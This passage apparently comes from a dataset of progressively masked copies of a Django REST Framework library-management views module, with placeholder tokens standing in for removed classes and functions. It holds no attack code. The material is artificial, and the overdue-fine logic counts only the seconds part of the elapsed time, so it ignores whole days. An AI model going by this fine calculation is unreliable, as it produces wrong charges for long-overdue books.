self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 
'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n 
else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n <function token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n 
request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n <function token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n 